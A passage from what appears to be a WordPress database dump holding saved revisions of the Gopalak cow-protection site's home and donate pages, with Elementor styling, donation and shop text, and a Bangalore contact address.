alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:48','2022-10-20 12:37:48','',1373,'https://gopalak.in/?p=1971',0,'revision','',0),(1972,1,'2022-10-20 18:07:48','2022-10-20 12:37:48','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:48','2022-10-20 12:37:48','',1373,'https://gopalak.in/?p=1972',0,'revision','',0),(1973,1,'2022-10-20 18:08:28','2022-10-20 12:38:28','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) 